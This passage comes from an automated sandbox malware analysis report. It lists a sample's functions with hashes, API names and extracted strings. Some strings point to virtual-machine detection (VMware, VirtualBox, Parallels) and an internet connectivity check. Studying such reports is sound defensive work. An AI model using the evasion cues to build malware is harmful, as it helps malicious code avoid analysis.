                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf$_invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 93898633-0
                                                                • Opcode ID: b80876e374300ff4d0c19d722e5e3817ebb8e66b6addca8ad9011ebc660ffa9e
                                                                • Instruction ID: e8a4fbbd30b9bfd7c5571653659948a29472336fdc5f4f769d803da5f6df68e1
                                                                • Opcode Fuzzy Hash: b80876e374300ff4d0c19d722e5e3817ebb8e66b6addca8ad9011ebc660ffa9e
                                                                • Instruction Fuzzy Hash: A6020463F1AA888AFB14CB65D4507FD23A1EB56BD8F404331EE5C97B99EE2CD9418340
                                                                Function 00007FF6A54D3CDC Relevance: 7.9, APIs: 5, Instructions: 440COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf$_invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 93898633-0
                                                                • Opcode ID: 9e756bb3dfc0d124286016c15491c1990ae2df6e2c09c8d619984af52a27a58a
                                                                • Instruction ID: 4868497fa691805ce569eef85f4cce088c9c83a47f35217bb44ae0c208c281f7
                                                                • Opcode Fuzzy Hash: 9e756bb3dfc0d124286016c15491c1990ae2df6e2c09c8d619984af52a27a58a
                                                                • Instruction Fuzzy Hash: 9E021663F1AA848AFB14CB65D4503FC63A1EB56BD8F404331EE5C97AD9EE2CD9418340
                                                                Function 00007FF6A54BA6B4 Relevance: 7.9, APIs: 5, Instructions: 437COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: swprintf$_invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 93898633-0
                                                                • Opcode ID: 0d669dadff5d5c7f1685a0821992bafaa3974b14a1f794cd5944ea6bef921f98
                                                                • Instruction ID: 1dd2a146fdd2eb4f04c17c0544f9dc9e23e788dfb73bfaa06f40d34e559e70ee
                                                                • Opcode Fuzzy Hash: 0d669dadff5d5c7f1685a0821992bafaa3974b14a1f794cd5944ea6bef921f98
                                                                • Instruction Fuzzy Hash: 52022463F1AA848AFB10DB65D8507FD23A1EB56BD8F404331DE5C97B9AEE2CD9418340
                                                                Function 00007FF6A54A51C0 Relevance: 7.6, APIs: 5, Instructions: 68encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: BinaryConcurrency::details::CryptEmptyQueue::StringStructuredWork$Concurrency::details::_CriticalLock::_ReentrantScoped_lockScoped_lock::~_
                                                                • String ID:
                                                                • API String ID: 1793015442-0
                                                                • Opcode ID: b1db1362e8f7666fa33966f67872ea6d751e12cb592cb259104bd87ec26e7aa5
                                                                • Instruction ID: 8ed7b367cc64a1988262c409b1809d295c2f89c7b1afb82afd6ee6fc05bef853
                                                                • Opcode Fuzzy Hash: b1db1362e8f7666fa33966f67872ea6d751e12cb592cb259104bd87ec26e7aa5
                                                                • Instruction Fuzzy Hash: 3031FB3261DA8181DA60EB61F4503AFA761FBC6B84F504035EB8DC7B9ADF7CE9048B40
                                                                Function 00007FF6A54FB0A4 Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0D2
                                                                  • Part of subcall function 00007FF6A54FAD14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A54FAD28
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0E3
                                                                  • Part of subcall function 00007FF6A54FACB4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A54FACC8
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0F4
                                                                  • Part of subcall function 00007FF6A54FACE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A54FACF8
                                                                  • Part of subcall function 00007FF6A54F3DF0: HeapFree.KERNEL32(?,?,00000000,00007FF6A54FE3EE,?,?,?,00007FF6A54FE76B,?,?,00000000,00007FF6A54FECA9,?,?,?,00007FF6A54FEBDB), ref: 00007FF6A54F3E06
                                                                  • Part of subcall function 00007FF6A54F3DF0: GetLastError.KERNEL32(?,?,00000000,00007FF6A54FE3EE,?,?,?,00007FF6A54FE76B,?,?,00000000,00007FF6A54FECA9,?,?,?,00007FF6A54FEBDB), ref: 00007FF6A54F3E10
                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6A54FB334), ref: 00007FF6A54FB11B
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                • String ID:
                                                                • API String ID: 3458911817-0
                                                                • Opcode ID: a8e7ba172922adc6102ec0b169fffa80db1e84fa108491f87f32945443e031d2
                                                                • Instruction ID: 63b4cd99afc0b869ffd1f8447524758ea677e5d072f58b28cf2f8e24d4f970bf
                                                                • Opcode Fuzzy Hash: a8e7ba172922adc6102ec0b169fffa80db1e84fa108491f87f32945443e031d2
                                                                • Instruction Fuzzy Hash: 63516136A1A74286E720DF26E8915AD77A0FF4AF88F454135EA4DC3A96DF3CEC448740
                                                                Function 00007FF6A54FFAC4 Relevance: 4.7, APIs: 3, Instructions: 167COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 1791019856-0
                                                                • Opcode ID: da8683dd3e0e58af869e83b33cf9f304577a22ec7fecedeb05b0833555dcf478
                                                                • Instruction ID: 273d355a3a6a7d6b730127787498b463ea89823ae8c8fb0623b5b467b97f27aa
                                                                • Opcode Fuzzy Hash: da8683dd3e0e58af869e83b33cf9f304577a22ec7fecedeb05b0833555dcf478
                                                                • Instruction Fuzzy Hash: 6B616D72A1A5929BEB24CF19E5802B973A1FF46F48F048135CB9ED3691DE3CE959C700
                                                                Function 00007FF6A54A5790 Relevance: 4.5, APIs: 3, Instructions: 49memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                • String ID:
                                                                • API String ID: 3429775523-0
                                                                • Opcode ID: be82b1885dd7d7955bcd52d39be54fbf320cbda3d1e64b10f056933fab6e0425
                                                                • Instruction ID: bd8e02353cc8ee6960fc41e91ffb76c0cd9f968ca4100bcd53ddccf304fb9c1b
                                                                • Opcode Fuzzy Hash: be82b1885dd7d7955bcd52d39be54fbf320cbda3d1e64b10f056933fab6e0425
                                                                • Instruction Fuzzy Hash: 14212C7250D7808AF750CB25E46436BBBE0F792B48F540029E7C986AA9CF7DE448CF80
                                                                Function 00007FF6A54A7CC0 Relevance: 3.8, Strings: 3, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PARALLELS$VBOX$VMWARE
                                                                • API String ID: 0-3366580982
                                                                • Opcode ID: 2cc3addcba5be056e9715ab0f8dd42c8806a99efe45192e81d301b53f6a2213c
                                                                • Instruction ID: edaa118d85d699d058f4311164ed234c70efde96b4a7c792cb294880c1aea902
                                                                • Opcode Fuzzy Hash: 2cc3addcba5be056e9715ab0f8dd42c8806a99efe45192e81d301b53f6a2213c
                                                                • Instruction Fuzzy Hash: 05212C3650EF8581EA60CB04F44036AB7A4FB8AB88F500136EACD83B69DF3CD555CB40
                                                                Function 00007FF6A54F4750 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: GetLocaleInfoEx
                                                                • API String ID: 2299586839-2904428671
                                                                • Opcode ID: 4eb7c83fbd0732192bab9355dfa31452ccf0d7db6d48fe87a0f4cc457e1c94cc
                                                                • Instruction ID: 16ca81b68ef37aff73cf66df85b5f06072996b2cc7e0e8d18df0caf947bac007
                                                                • Opcode Fuzzy Hash: 4eb7c83fbd0732192bab9355dfa31452ccf0d7db6d48fe87a0f4cc457e1c94cc
                                                                • Instruction Fuzzy Hash: 2F01A224B09A8189FB44DB5BB5401AAA7A0EF86FD4F588036DF4D83B69CE3CDD458340
                                                                Function 00007FF6A54A81C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CheckConnectionInternet
                                                                • String ID: http://www.google.com
                                                                • API String ID: 3847983778-1587574693
                                                                • Opcode ID: 2d63d6084c5bc36033196a9e802d62b989daa62fbe7d3658ad10ea2a4e957f56
                                                                • Instruction ID: 47b488fea2ba89a78c0c7281cbf46dbc4c732949764160ee825392327acd5d2e
                                                                • Opcode Fuzzy Hash: 2d63d6084c5bc36033196a9e802d62b989daa62fbe7d3658ad10ea2a4e957f56
                                                                • Instruction Fuzzy Hash: 9FD01725A1D4D29AE7A0D324A81133A2A50FB96B08F941172DACC82AA5DF5DDA54CB11
                                                                Function 00007FF6A54FFD0C Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue$InfoLocale
                                                                • String ID:
                                                                • API String ID: 673564084-0
                                                                • Opcode ID: 71927cf5d111a0085b870db45152aab8aa78d043065b6d4fcb7de9a32e9aeed0
                                                                • Instruction ID: c180fe5e8c9c6b8e090d95e7a31cf57e1698692ac74c8ba01e9e42b4671cfb45
                                                                • Opcode Fuzzy Hash: 71927cf5d111a0085b870db45152aab8aa78d043065b6d4fcb7de9a32e9aeed0
                                                                • Instruction Fuzzy Hash: 12317132A0A68656EB24DB25E4413BA73A1FF8AF84F448135DA4EC3285DF3CEC59C700
                                                                Function 00007FF6A54A7DA0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AdaptersInfo
                                                                • String ID:
                                                                • API String ID: 3177971545-0
                                                                • Opcode ID: 101e0bfac433c4f22afc23d766d719fdae321b226476ae1a5cd67a6f5b6f410d
                                                                • Instruction ID: 454a11eb38ad71cd0c1a60e811224a97717cacf721bf09856360d9f993c4c53f
                                                                • Opcode Fuzzy Hash: 101e0bfac433c4f22afc23d766d719fdae321b226476ae1a5cd67a6f5b6f410d
                                                                • Instruction Fuzzy Hash: F1316522709A8641EBB4CB19E0913BAA7D0F7CAB49F440132EACDC6795DF2DDE418B00
                                                                Function 00007FF6A54FF95C Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00007FF6A54F38C4: GetLastError.KERNEL32 ref: 00007FF6A54F38D3
                                                                  • Part of subcall function 00007FF6A54F38C4: FlsGetValue.KERNEL32 ref: 00007FF6A54F38E8
                                                                  • Part of subcall function 00007FF6A54F38C4: SetLastError.KERNEL32 ref: 00007FF6A54F3973
                                                                • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6A550014B,?,00000000,00000092,?,?,00000000,?,00007FF6A54F1B19), ref: 00007FF6A54FF9FA
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystemValue
                                                                • String ID:
                                                                • API String ID: 3029459697-0
                                                                • Opcode ID: 7ca1aa2e8d1db19ef7e18af03e6ce1dd088753f845cfb804bc33f93447c23711
                                                                • Instruction ID: 63661646f06c56622fc4ace3f5cc7fa981d5b1491ab260f7e61a48e651ace998
                                                                • Opcode Fuzzy Hash: 7ca1aa2e8d1db19ef7e18af03e6ce1dd088753f845cfb804bc33f93447c23711
                                                                • Instruction Fuzzy Hash: 3E112463E096459BEB15CF1AD0806A877A0FB91FE0F448131DA69833C0EE38D9D9C740
                                                                Function 00007FF6A54FFF14 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00007FF6A54F38C4: GetLastError.KERNEL32 ref: 00007FF6A54F38D3
                                                                  • Part of subcall function 00007FF6A54F38C4: FlsGetValue.KERNEL32 ref: 00007FF6A54F38E8
                                                                  • Part of subcall function 00007FF6A54F38C4: SetLastError.KERNEL32 ref: 00007FF6A54F3973
                                                                • GetLocaleInfoW.KERNEL32(?,?,?,00007FF6A54FFCBE), ref: 00007FF6A54FFF4B
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$InfoLocaleValue
                                                                • String ID:
                                                                • API String ID: 3796814847-0
                                                                • Opcode ID: 2ef048004312906b102789e26a2980c8c4b0cdb7b6c31b34a19084624895d655
                                                                • Instruction ID: 6251cfb1bfd3c70076c1ae59e33bd07071c1f731b04cdef1fbdb92bdf4b01c4a
                                                                • Opcode Fuzzy Hash: 2ef048004312906b102789e26a2980c8c4b0cdb7b6c31b34a19084624895d655
                                                                • Instruction Fuzzy Hash: 32112732B19593A3E774C729A040A7A62A1EF46F64F544232D62D836C8EE29DC88C310
                                                                Function 00007FF6A54FFA2C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00007FF6A54F38C4: GetLastError.KERNEL32 ref: 00007FF6A54F38D3
                                                                  • Part of subcall function 00007FF6A54F38C4: FlsGetValue.KERNEL32 ref: 00007FF6A54F38E8
                                                                  • Part of subcall function 00007FF6A54F38C4: SetLastError.KERNEL32 ref: 00007FF6A54F3973
                                                                • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6A5500107,?,00000000,00000092,?,?,00000000,?,00007FF6A54F1B19), ref: 00007FF6A54FFAAA
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystemValue
                                                                • String ID:
                                                                • API String ID: 3029459697-0
                                                                • Opcode ID: 3dde3cdf9fb8bdbd8165fba826077624d4fd8c25bf31b1976eaf52051ad3615f
                                                                • Instruction ID: 432c89460fc1efe419a81366e53513dfd0b7f3aadafc9c792d91ef453750af68
                                                                • Opcode Fuzzy Hash: 3dde3cdf9fb8bdbd8165fba826077624d4fd8c25bf31b1976eaf52051ad3615f
                                                                • Instruction Fuzzy Hash: 7E01B172E0928297E7248F19E440BB976E1EF42FA4F458232D669876D9DF7C9C88C700
                                                                Function 00007FF6A54F4210 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF6A54F465F,?,?,?,?,?,?,?,?,00000000,00007FF6A54FEFAC), ref: 00007FF6A54F425F
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: EnumLocalesSystem
                                                                • String ID:
                                                                • API String ID: 2099609381-0
                                                                • Opcode ID: 07fca86cf71cc0f9e3e72088cddb075a7fce862fc20fec13c8eac6196351704b
                                                                • Instruction ID: a54bd36411097a4530d5633ff1006742a9195ea46640ea80596eb37a6bc399c5
                                                                • Opcode Fuzzy Hash: 07fca86cf71cc0f9e3e72088cddb075a7fce862fc20fec13c8eac6196351704b
                                                                • Instruction Fuzzy Hash: 56F01976A0AA4182E604DB29F8905A923A1FB9AB80F548035EE5DD3765DE3CEC658700
                                                                Function 00007FF6A54DC884 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: 80ae628b7d04fe775ba5728e1ddd22ecc467c1d84a2a1878acf2190f691b61bc
                                                                • Instruction ID: ac8c4003acaf67f43b4c89bbffb2820fd3f45ad96df8e391d60dd87bfb1413c8
                                                                • Opcode Fuzzy Hash: 80ae628b7d04fe775ba5728e1ddd22ecc467c1d84a2a1878acf2190f691b61bc
                                                                • Instruction Fuzzy Hash: 30F05867E6E5829AF3A8DA589098B7832A0EF42B12F400536F50BC26D2CE1CED458701
                                                                Function 00007FF6A54A3BE8 Relevance: 49.3, APIs: 16, Strings: 12, Instructions: 342memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
